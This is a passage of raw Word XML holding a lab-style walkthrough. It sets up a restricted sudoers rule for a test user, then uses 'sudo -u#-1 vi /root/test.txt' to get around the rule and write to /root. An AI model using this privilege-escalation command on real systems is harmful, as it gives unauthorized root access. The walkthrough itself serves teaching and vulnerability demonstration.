    <w:p w14:paraId="05F53C18" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="580C3FC3" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="646FCF10" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="0F2FB99B" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="7C50A0BB" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="0FAA114B" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="0A24B8AB" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="02D7C0B7" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="31AFA9BD" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="5F2B2EB9" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="6C1350AA" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="79D485B3" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="29A7EBDF" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="1D01242D" w14:textId="691A1BC3" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:r>
        <w:t xml:space="preserve">Then, need to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>to</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> create a user for check the exploitation So that, I </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>using</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD3B7A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>useradd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD3B7A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -m -s /bin/bash/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD3B7A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>upekshitha</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> for create the user and then type the </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD3B7A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">passwd </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD3B7A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>upekshitha</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> for generate a password for that user.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD58453" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14D213B4" wp14:editId="5A4AAA32">
            <wp:extent cx="5730240" cy="15468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p>
    <w:p w14:paraId="4D4243E9" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="023420BC" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="587C759F" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="24D86CAB" w14:textId="2A10904C" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:r w:rsidRPr="00AD3B7A">
        <w:t xml:space="preserve">Edits file </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD3B7A">
        <w:t>sudoers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD3B7A">
        <w:t xml:space="preserve">. This uses a special executable that tests the file's syntax to ensure that a corrupted </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD3B7A">
        <w:t>sudoers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD3B7A">
        <w:t xml:space="preserve"> file </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AD3B7A">
        <w:t>doesn't</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AD3B7A">
        <w:t xml:space="preserve"> lock you out of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD3B7A">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD3B7A">
        <w:t xml:space="preserve">. It will interrupt you if you attempt to save an invalid configuration and return you to the editor to </w:t>
      </w:r>
      <w:r>
        <w:t>fix</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD3B7A">
        <w:t xml:space="preserve"> it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCDA196" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D7016C7" wp14:editId="5026CF98">
            <wp:extent cx="5722620" cy="1623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623060"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BCAA37" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="04DAFF10" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="1062F9F0" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="6F01873E" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="3FE2975C" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="024E4E0B" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="617FC7EC" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="03DD873D" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="7C25B514" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="279AB4A8" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="373DEA32" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="1F4A87C8" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="2348B6FC" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="2ACBE773" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="688E822C" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="2327E990" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="7915E9ED" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="448C4C1A" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="04A00A28" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="020AA24E" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="63232C71" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="07143F1A" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="6077BEAF" w14:textId="576CE183" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:r w:rsidRPr="0080737E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">You can see that </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0080737E">
        <w:t>I'm</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0080737E">
        <w:t xml:space="preserve"> running as root now, by default, Vasudha will use your default editor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> distribution. In my case it taken as a nano editor. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDB306A" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="2FDD417A" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BF6EB6F" wp14:editId="4AB2ECC5">
            <wp:extent cx="5730240" cy="43434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343400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5625BF9C" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="013498CB" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="5BAFAB22" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="5FB0FF73" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="00679DA7" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="065560B8" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="68EAE182" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="6D358257" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="0E02B8D0" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="482F5F80" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="4049A2DF" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="0AE0A101" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="5763269D" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="07ABB7A1" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="42B59835" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="5F61BA59" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="2AE893F0" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="49350148" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="4EF47837" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="59D66468" w14:textId="117EF7C8" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:r w:rsidRPr="0080737E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Now that we realize that we can actually start issuing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0080737E">
        <w:t>upekshitha</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0080737E">
        <w:t xml:space="preserve"> permissions, let me say </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0080737E">
        <w:t>upekshitha</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0080737E">
        <w:t xml:space="preserve"> all and we're going to say yes you can run as all users except the root user, so </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0080737E">
        <w:t>I'm</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0080737E">
        <w:t xml:space="preserve"> going to say accept root and I'm going to close that and then after that we can decide commands now that all of you or other system administrators can run all commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D6E09F" w14:textId="547F7A06" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:r w:rsidRPr="008D693C">
        <w:t xml:space="preserve">Here alias and I can tell the alias command is going to be vim in the right and I can save them is going to be the same as </w:t>
      </w:r>
      <w:r w:rsidRPr="008D693C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D693C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D693C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/bin/vi</w:t>
      </w:r>
      <w:r w:rsidRPr="008D693C">
        <w:t xml:space="preserve"> right and I can define the </w:t>
      </w:r>
      <w:r w:rsidRPr="008D693C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>alias</w:t>
      </w:r>
      <w:r w:rsidRPr="008D693C">
        <w:t xml:space="preserve"> command here by typing in vim and that's one of the best things about using the aliases command</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF82528" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="1E73F5DA" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D322DB0" wp14:editId="190F96E6">
            <wp:extent cx="5730240" cy="44196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14:paraId="61AB679D" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="07B2CD74" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="71807F54" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="69A1AF73" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="7AD4CB61" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="508B4B10" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="0ACB845A" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="3CA11483" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="0A9CB8B0" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="7558F41D" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="5DBB5967" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="7B67E8F3" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="4E1A4F06" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="008D693C">
        <w:t>o I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008D693C">
        <w:t>save</w:t>
      </w:r>
      <w:r>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="008D693C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>above</w:t>
      </w:r>
      <w:r w:rsidRPr="008D693C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>edited one</w:t>
      </w:r>
      <w:r w:rsidRPr="008D693C">
        <w:t xml:space="preserve"> and I'm going to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008D693C">
        <w:t xml:space="preserve">exit </w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and then going to the </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">user called </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>upekshitha</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3965FC46" w14:textId="4A698B85" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="061CC6DB" wp14:editId="1905761C">
            <wp:extent cx="5722620" cy="163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638300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="188BD616" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="28B861CD" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="6761D419" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="310B5DC8" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="47A0B680" w14:textId="751490FE" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:r w:rsidRPr="003545C5">
        <w:t xml:space="preserve">If I tell </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003545C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003545C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> vi</w:t>
      </w:r>
      <w:r w:rsidRPr="003545C5">
        <w:t xml:space="preserve"> and I go to the root directory and create a File called </w:t>
      </w:r>
      <w:r w:rsidRPr="003545C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>root/test.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="003545C5">
        <w:t xml:space="preserve"> and I'd enter you can see it gives me the same error correctly so I can't execute this command as the root user</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797F4B5E" w14:textId="237B489D" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="4B9D856D" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="7B86224A" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0190CCA5" wp14:editId="2B077976">
            <wp:extent cx="5730240" cy="13030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303020"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DE7042" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="67858C16" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:r w:rsidRPr="003545C5">
        <w:t xml:space="preserve">And now, if I change it and tell </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003545C5">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003545C5">
        <w:t xml:space="preserve"> us</w:t>
      </w:r>
      <w:r>
        <w:t>er</w:t>
      </w:r>
      <w:r w:rsidRPr="003545C5">
        <w:t xml:space="preserve"> I can use any user ID I want, I can also choose my own user ID / that's going to make some sense and I'm going to enter a negative one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095C085B" w14:textId="1C197EBA" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="003545C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>udo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003545C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -u#-1 vi /root/test.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191F5A79" w14:textId="62DE9092" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F5D2F39" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="003545C5" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AB92ECD" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58CB5B17" wp14:editId="0C7261AE">
            <wp:extent cx="5722620" cy="1173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1173480"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D453A9A" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="052FD182" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="0E02BD5B" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="65F4F321" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="47F4CFE0" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="0BFFFF91" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="03E5EE68" w14:textId="76FC23F5" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:r>
        <w:t>And now you can see I can create a text file and I type hello world0 and save and exit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FC5661" w14:textId="088AA221" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="497A8C20" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="26F7B1B2" w14:textId="7D5E940B" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B1A039D" wp14:editId="500968BD">
            <wp:extent cx="5722620" cy="1584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584960"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="306263D5" w14:textId="3478A560" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="136D31EA" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="0768D00F" w14:textId="5F208FE9" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:r>
        <w:t>So then,</w:t>
      </w:r>
      <w:r w:rsidRPr="003545C5">
        <w:t xml:space="preserve"> if I go back here to root then I know I </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003545C5">
        <w:t>won't</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003545C5">
        <w:t xml:space="preserve"> be able to search the directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3DB66E" w14:textId="7D8CA387" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
